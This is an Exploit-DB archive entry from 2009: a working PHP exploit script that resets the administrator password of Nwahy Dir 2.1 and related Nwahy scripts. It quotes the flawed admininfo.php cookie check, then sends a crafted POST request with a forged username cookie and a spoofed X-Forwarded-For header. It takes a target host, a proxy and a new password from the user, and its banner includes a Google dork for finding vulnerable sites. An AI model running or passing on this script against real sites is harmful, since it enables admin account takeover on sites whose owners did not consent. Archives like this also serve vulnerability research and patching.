Nwahy Dir 2.1 - Arbitrary Change Admin Password

EDB-ID:

9087

CVE:



Author:

rEcruit

Type:

webapps


Platform:

PHP

Date:

2009-07-09


<?

	/*

			[ Nwahy Dir v2.1 Change Admin Password Exploit ]         
			
		[-] Author        : rEcruit
		[-] Mail            : recru1t[@]ymail.com
		[-] Download   : http://nwahy.com/showdownload-3105.html
		
		[-] Vuln in  ./admincp/admininfo.php
		
			[code]
			
			$u = addslashes($_COOKIE['username']);
			$query = mysql_query ("SELECT * FROM `dlil_admin` WHERE username='$u' AND adminoruser='0'") or die ("Query failed");
			$counts = mysql_num_rows($query);
			if($counts == 0){
			echo "<div align='center'>......................</div>";
			}else{
				
			[/code]
			
		[-] Works On :
		
			1. Nwahy Articles v1
				
			2. Nwahy scripts v1

			3. Nwahy book v1
			
		[-] Note : Path to Control Panel   "/admincp/" .

	*/

	error_reporting(0);
	ini_set("max_execution_time",0);
	ini_set("default_socket_timeout",5);


	function Usage()
	{
			print "\n\n";
			print "/------------------------------------------------------------\\\n";
			print "|        Nwahy Dir v2.1 Change Admin Password Exploit        |\n";
			print "\------------------------------------------------------------/\n";
			print "| [-] Author : rEcruit                                       |\n";
			print "| [-] Mail   : recru1t@ymail.com                             |\n";
			print "| [-] Greetz : RAGE SCREAM  , SAUDI L0rD , Fantastic Egypt   |\n";
			print "\------------------------------------------------------------/\n";
			print "| [-] Dork     : Nwahy.com 2.1 , inurl:'add-site.html'       |\n";
			print "| [+] Usage    : php Exploit.php HOST PATH Options           |\n";
			print "| [-] HOST     : Target server (ip/hostname)                 |\n";
			print "| [-] PATH     : Path to Nwahy Dir                           |\n";
			print "| [-] Options  :                                             |\n";
			print "|     =>Proxy  :(ex. 0.0.0.0:8080)                           |\n";
			print "\------------------------------------------------------------/\n";
			print "\n\n";

		exit;
	}


	function Send()
	{
		Global $host,$path,$user,$pwd,$proxy;
		
		if(empty($proxy))
		{
			$Connect	= @fsockopen($host,"80") or die("[-] Bad Host .");
		}else{
			$proxy		= explode(":",$proxy);
			$Connect	= @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy .");
		}
		
			$Payload	= "username={$user}&password={$pwd}";
			$Packet		.= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 \r\n";
			$Packet		.= "Host: {$host}\r\n";
			$Packet		.= "Cookie: username={$user}\r\n";
			$Packet		.= "X-Forwarded-For: 127.0.0.1\r\n";
			$Packet		.= "Content-Type: application/x-www-form-urlencoded\r\n";
			$Packet		.= "Content-Length: ".(strlen($Payload))."\r\n";
			$Packet		.= "Connection: close\r\n\r\n";
			$Packet		.= $Payload;

				fputs($Connect,$Packet);

				while(!feof($Connect)) 
				$Response	.= @fgets($Connect,2048);

				fclose($Connect);
		
		return $Response;
	}
	
	
	function Login()
	{
		$Response	= @Send();

			if(eregi("refresh",$Response))
			{
				$msg	= "[-] Password changed .\n";
			}
			elseif(eregi("<div align='center'>",$Response))
			{
				$msg	= "[-] Bad username .\n";
			}
			else
			{
				$msg	= "[-] Exploit failed .\n";
			}

		return $msg;
	}



	if ($argc < 3) Usage();

	$host	= $argv[1];
	$path	= $argv[2];;
	$proxy	= $argv[3];

	
		Print "\r\n[-] Connecting to {$host} .... \r\n";
		
		while(1)
		{
			Print "[-] Username: ";

			if($user = str_replace (" ", "%20", trim(fgets(STDIN))))
			{
				Print "[-] New password: ";

				if($pwd = str_replace (" ", "%20", trim(fgets(STDIN))))
				{
					Print Login();
					exit;
				}


			}


		} //end while

?>

# milw0rm.com [2009-07-09]